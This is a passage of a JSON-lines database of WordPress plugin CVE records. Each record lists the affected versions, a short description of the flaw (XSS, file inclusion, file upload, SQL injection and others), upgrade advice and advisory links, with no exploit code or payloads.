page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-encoder-bundle\\\/tags\\\/2.1.7\\\/core\\\/includes\\\/classes\\\/class-email-encoder-bundle-run.php#L529\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-encoder-bundle\\\/tags\\\/2.1.7\\\/core\\\/includes\\\/classes\\\/class-email-encoder-bundle-run.php#L529\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2958823\\\/email-encoder-bundle#file60\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2958823\\\/email-encoder-bundle#file60\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e90f04e4-eb4c-4822-89c6-79f553987c37?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e90f04e4-eb4c-4822-89c6-79f553987c37?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4753","slug":"print-o-matic","versionEndExcluding":"2.1.8","description":"The Print-O-Matic WordPress plugin before 2.1.8 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5d72ec1f-5379-4d8e-850c-afe8b41bb126\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5d72ec1f-5379-4d8e-850c-afe8b41bb126\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0543","slug":"bft-autoresponder","versionEndExcluding":"2.1.7.2","description":"The Arigato Autoresponder and Newsletter WordPress plugin before 2.1.7.2 does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e3771938-40b5-4e8b-bb5a-847131a2b4a7\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e3771938-40b5-4e8b-bb5a-847131a2b4a7\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7950","slug":"wp-job-portal","versionImpact":"2.1.6","versionEndExcluding":"2.1.7","description":"The WP Job Portal \u2013 A Complete Recruitment System for Company or Job Board website plugin for WordPress is vulnerable to Local File Inclusion, Arbitrary Settings Update, and User Creation in all versions up to, and including, 2.1.6 via several functions called by the 'checkFormRequest' function. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included. Attackers can also update arbitrary settings and create user accounts even when registration is disabled, leading to user creation with a default role of Administrator.","recommendation":"Update to version 2.1.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca1d5275-3398-47a7-889b-4050ebe635ee?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca1d5275-3398-47a7-889b-4050ebe635ee?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-job-portal\\\/tags\\\/2.1.5\\\/includes\\\/formhandler.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-job-portal\\\/tags\\\/2.1.5\\\/includes\\\/formhandler.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-job-portal\\\/tags\\\/2.1.5\\\/includes\\\/includer.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-job-portal\\\/tags\\\/2.1.5\\\/includes\\\/includer.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-job-portal\\\/tags\\\/2.1.5\\\/includes\\\/wpjobportal-hooks.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-job-portal\\\/tags\\\/2.1.5\\\/includes\\\/wpjobportal-hooks.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-job-portal\\\/tags\\\/2.1.5\\\/modules\\\/configuration\\\/controller.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-job-portal\\\/tags\\\/2.1.5\\\/modules\\\/configuration\\\/controller.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-job-portal\\\/tags\\\/2.1.5\\\/modules\\\/user\\\/controller.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-job-portal\\\/tags\\\/2.1.5\\\/modules\\\/user\\\/controller.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-job-portal\\\/tags\\\/2.1.5\\\/modules\\\/user\\\/tmpl\\\/views\\\/frontend\\\/form-field.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-job-portal\\\/tags\\\/2.1.5\\\/modules\\\/user\\\/tmpl\\\/views\\\/frontend\\\/form-field.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3138675\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3138675\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4395","slug":"membership-for-woocommerce","versionEndExcluding":"2.1.7","description":"The Membership For WooCommerce WordPress plugin before 2.1.7 does not validate uploaded files, which could allow unauthenticated users to upload arbitrary files, such as malicious PHP code, and achieve RCE.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/80407ac4-8ce3-4df7-9c41-007b69045c40\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/80407ac4-8ce3-4df7-9c41-007b69045c40\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9641","slug":"luckywp-table-of-contents","versionImpact":"2.1.6","versionEndExcluding":"2.1.7","description":"The LuckyWP Table of Contents WordPress plugin before 2.1.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 2.1.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/81aa922a-3b51-4cfe-9098-53234827610c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/81aa922a-3b51-4cfe-9098-53234827610c\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/81aa922a-3b51-4cfe-9098-53234827610c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/81aa922a-3b51-4cfe-9098-53234827610c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11780","slug":"site-search-360","versionImpact":"2.1.6","versionEndExcluding":"2.1.7","description":"The Site Search 360 plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'ss360-resultblock' shortcode in all versions up to, and including, 2.1.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.1.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3232517%40site-search-360&new=3232517%40site-search-360&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3232517%40site-search-360&new=3232517%40site-search-360&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4af66bb2-febe-4022-9526-39b1ecd8b01d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4af66bb2-febe-4022-9526-39b1ecd8b01d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4669","slug":"events-addon-for-elementor","versionImpact":"2.1.4","versionEndExcluding":"2.1.7","description":"The Events Addon for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Basic Slider, Upcoming Events, and Schedule widgets in all versions up to, and including, 2.1.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.1.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d0467548-f1eb-4ea2-9913-4b7ffeb6e91a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d0467548-f1eb-4ea2-9913-4b7ffeb6e91a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/events-addon-for-elementor\\\/trunk\\\/elementor\\\/widgets\\\/basic\\\/nabasic-slider.php#L1403\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/events-addon-for-elementor\\\/trunk\\\/elementor\\\/widgets\\\/basic\\\/nabasic-slider.php#L1403\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/events-addon-for-elementor\\\/trunk\\\/elementor\\\/widgets\\\/event-unique\\\/naevents-unique-upcoming.php#L1287\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/events-addon-for-elementor\\\/trunk\\\/elementor\\\/widgets\\\/event-unique\\\/naevents-unique-upcoming.php#L1287\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/events-addon-for-elementor\\\/trunk\\\/elementor\\\/widgets\\\/event-unique\\\/naevents-unique-schedule.php#L1267\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/events-addon-for-elementor\\\/trunk\\\/elementor\\\/widgets\\\/event-unique\\\/naevents-unique-schedule.php#L1267\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3100271\\\/#file378\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3100271\\\/#file378\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4314","slug":"wpdatatables","versionEndExcluding":"2.1.66","description":"The wpDataTables WordPress plugin before 2.1.66 does not validate the \"Serialized PHP array\" input data before deserializing the data. This allows admins to deserialize arbitrary data which may lead to remote code execution if a suitable gadget chain is present on the server. This is impactful in environments where admin users should not be allowed to execute arbitrary code, such as multisite.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1ab192d7-72ac-4f12-8a51-f28ee4db91bc\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1ab192d7-72ac-4f12-8a51-f28ee4db91bc\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1123","slug":"wp-smtp","versionImpact":"2.1.5","versionEndExcluding":"2.1.6","description":"The Solid Mail \u2013 SMTP email and logging made by SolidWP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via email Name, Subject, and Body in all versions up to, and including, 2.1.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.1.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3283671\\\/wp-smtp\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3283671\\\/wp-smtp\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f99a918d-53c1-46bd-8e55-9ba77a92efe8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f99a918d-53c1-46bd-8e55-9ba77a92efe8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10897","slug":"tutor-lms-elementor-addons","versionImpact":"2.1.5","versionEndExcluding":"2.1.6","description":"The Tutor LMS Elementor Addons plugin for WordPress is vulnerable to unauthorized plugin installation due to a missing capability check on the install_etlms_dependency_plugin() function in all versions up to, and including, 2.1.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to install Elementor or Tutor LMS. Please note the impact of this issue is incredibly limited due to the fact that these two plugins will likely already be installed as a dependency of the plugin.","recommendation":"Update to version 2.1.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/99edd858-5e2c-4cc5-adda-d8e70ddc86f6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/99edd858-5e2c-4cc5-adda-d8e70ddc86f6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tutor-lms-elementor-addons\\\/trunk\\\/classes\\\/Installer.php#L152\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tutor-lms-elementor-addons\\\/trunk\\\/classes\\\/Installer.php#L152\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3186320\\\/tutor-lms-elementor-addons\\\/trunk\\\/classes\\\/Installer.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3186320\\\/tutor-lms-elementor-addons\\\/trunk\\\/classes\\\/Installer.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12370","slug":"wp-hotel-booking","versionImpact":"2.1.5","versionEndExcluding":"2.1.6","description":"The WP Hotel Booking plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check when adding rooms in all versions up to, and including, 2.1.5. This makes it possible for unauthenticated attackers to add rooms with custom prices.","recommendation":"Update to version 2.1.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3210798%40wp-hotel-booking%2Ftags%2F2.1.5&new=3214765%40wp-hotel-booking%2Ftags%2F2.1.6\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3210798%40wp-hotel-booking%2Ftags%2F2.1.5&new=3214765%40wp-hotel-booking%2Ftags%2F2.1.6\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5df32365-5381-48e0-9313-7e83c4c6c440?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5df32365-5381-48e0-9313-7e83c4c6c440?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4290","slug":"shortcode-gallery-for-matterport-showcase","versionImpact":"2.1.5","versionEndExcluding":"2.1.6","description":"The WP Matterport Shortcode WordPress plugin before 2.1.7 does not escape the PHP_SELF server variable when outputting it in attributes, leading to Reflected Cross-Site Scripting issues which could be used against high privilege users such as admin","recommendation":"Update to version 2.1.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5fad5245-a089-4ba3-9958-1e2c3d066eea\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5fad5245-a089-4ba3-9958-1e2c3d066eea\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6283","slug":"dethemekit-for-elementor","versionImpact":"2.1.5","versionEndExcluding":"2.1.6","description":"The DethemeKit For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the URL parameter of the De Gallery widget in all versions up to and including 2.1.5 due to insufficient input sanitization and output escaping on user-supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user clicks on the injected link.","recommendation":"Update to version 2.1.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9b2083f9-79d0-43f6-b7ae-a5817dc561b0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9b2083f9-79d0-43f6-b7ae-a5817dc561b0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dethemekit-for-elementor\\\/trunk\\\/widgets\\\/dethemekit-grid.php#L2565\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dethemekit-for-elementor\\\/trunk\\\/widgets\\\/dethemekit-grid.php#L2565\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dethemekit-for-elementor\\\/trunk\\\/widgets\\\/dethemekit-grid.php#L2900\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dethemekit-for-elementor\\\/trunk\\\/widgets\\\/dethemekit-grid.php#L2900\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1905","slug":"wp-popups-lite","versionEndExcluding":"2.1.5.1","description":"The WP Popups WordPress plugin before 2.1.5.1 does not properly escape the href attribute of its spu-facebook-page shortcode before outputting it back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks. This is due to an insufficient fix of CVE-2023-24003","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b6ac3e15-6f39-4514-a50d-cca7b9457736\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b6ac3e15-6f39-4514-a50d-cca7b9457736\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-22802","slug":"yeemail","versionImpact":"2.1.4","versionEndExcluding":"2.1.5","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in add-ons.org Email Templates Customizer for WordPress \u2013 Drag And Drop Email Templates Builder \u2013 YeeMail allows Stored XSS.This issue affects Email Templates Customizer for WordPress \u2013 Drag And Drop Email Templates Builder \u2013 YeeMail: from n\/a through 2.1.4.","recommendation":"Update to version 2.1.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/yeemail\\\/vulnerability\\\/wordpress-email-templates-customizer-yeemail-plugin-2-1-4-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/yeemail\\\/vulnerability\\\/wordpress-email-templates-customizer-yeemail-plugin-2-1-4-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4521","slug":"import-xml-feed","versionEndExcluding":"2.1.5","description":"The Import XML and RSS Feeds WordPress plugin before 2.1.5 contains a web shell, allowing unauthenticated attackers to perform RCE. The plugin\/vendor was not compromised and the files are the result of running a PoC for a previously reported issue (https:\/\/wpscan.com\/vulnerability\/d4220025-2272-4d5f-9703-4b2ac4a51c42) and not deleting the created files when releasing the new version.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/de2cdb38-3a9f-448e-b564-a798d1e93481\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/de2cdb38-3a9f-448e-b564-a798d1e93481\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12468","slug":"wp-datepicker","versionImpact":"2.1.4","versionEndExcluding":"2.1.5","description":"The WP Datepicker plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'wpdp_get_selected_datepicker' parameter in all versions up to, and including, 2.1.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.1.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-datepicker\\\/tags\\\/2.1.3\\\/inc\\\/wpdp_settings.php#L267\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-datepicker\\\/tags\\\/2.1.3\\\/inc\\\/wpdp_settings.php#L267\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-datepicker\\\/tags\\\/2.1.3\\\/inc\\\/wpdp_settings.php#L271\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-datepicker\\\/tags\\\/2.1.3\\\/inc\\\/wpdp_settings.php#L271\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-datepicker\\\/tags\\\/2.1.3\\\/inc\\\/wpdp_settings.php#L359\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-datepicker\\\/tags\\\/2.1.3\\\/inc\\\/wpdp_settings.php#L359\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-datepicker\\\/tags\\\/2.1.3\\\/inc\\\/wpdp_settings.php#L361\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-datepicker\\\/tags\\\/2.1.3\\\/inc\\\/wpdp_settings.php#L361\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-datepicker\\\/tags\\\/2.1.3\\\/inc\\\/wpdp_settings.php#L377\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-datepicker\\\/tags\\\/2.1.3\\\/inc\\\/wpdp_settings.php#L377\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-datepicker\\\/tags\\\/2.1.3\\\/inc\\\/wpdp_settings.php#L401\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-datepicker\\\/tags\\\/2.1.3\\\/inc\\\/wpdp_settings.php#L401\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-datepicker\\\/tags\\\/2.1.3\\\/inc\\\/wpdp_settings.php#L402\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-datepicker\\\/tags\\\/2.1.3\\\/inc\\\/wpdp_settings.php#L402\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-datepicker\\\/tags\\\/2.1.3\\\/inc\\\/wpdp_settings.php#L408\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-datepicker\\\/tags\\\/2.1.3\\\/inc\\\/wpdp_settings.php#L408\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-datepicker\\\/tags\\\/2.1.3\\\/inc\\\/wpdp_settings.php#L409\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-datepicker\\\/tags\\\/2.1.3\\\/inc\\\/wpdp_settings.php#L409\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-datepicker\\\/tags\\\/2.1.3\\\/inc\\\/wpdp_settings.php#L415\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-datepicker\\\/tags\\\/2.1.3\\\/inc\\\/wpdp_settings.php#L415\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-datepicker\\\/tags\\\/2.1.3\\\/inc\\\/wpdp_settings.php#L416\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-datepicker\\\/tags\\\/2.1.3\\\/inc\\\/wpdp_settings.php#L416\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-datepicker\\\/tags\\\/2.1.3\\\/inc\\\/wpdp_settings.php#L423\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-datepicker\\\/tags\\\/2.1.3\\\/inc\\\/wpdp_settings.php#L423\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-datepicker\\\/tags\\\/2.1.3\\\/inc\\\/wpdp_settings.php#L552\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-datepicker\\\/tags\\\/2.1.3\\\/inc\\\/wpdp_settings.php#L552\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-datepicker\\\/tags\\\/2.1.3\\\/inc\\\/wpdp_settings.php#L553\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-datepicker\\\/tags\\\/2.1.3\\\/inc\\\/wpdp_settings.php#L553\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3210616%40wp-datepicker&new=3210616%40wp-datepicker&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3210616%40wp-datepicker&new=3210616%40wp-datepicker&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3212312%40wp-datepicker&new=3212312%40wp-datepicker&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3212312%40wp-datepicker&new=3212312%40wp-datepicker&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b6b61731-ded2-4ac1-83f6-686daf92441e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b6b61731-ded2-4ac1-83f6-686daf92441e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-45069","slug":"gallery-videos","versionEndExcluding":"2.1.5","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Video Gallery by Total-Soft Video Gallery \u2013 Best WordPress YouTube Gallery Plugin allows SQL Injection.This issue affects Video Gallery \u2013 Best WordPress YouTube Gallery Plugin: from n\/a through 2.1.3.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/gallery-videos\\\/wordpress-gallery-video-plugin-2-0-2-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/gallery-videos\\\/wordpress-gallery-video-plugin-2-0-2-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0699","slug":"ai-engine","versionImpact":"2.1.4","versionEndExcluding":"2.1.5","description":"The AI Engine: Chatbots, Generators, Assistants, GPT 4 and more! plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'add_image_from_url' function in all versions up to, and including, 2.1.4. This makes it possible for authenticated attackers, with Editor access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 2.1.5, or a newer patched 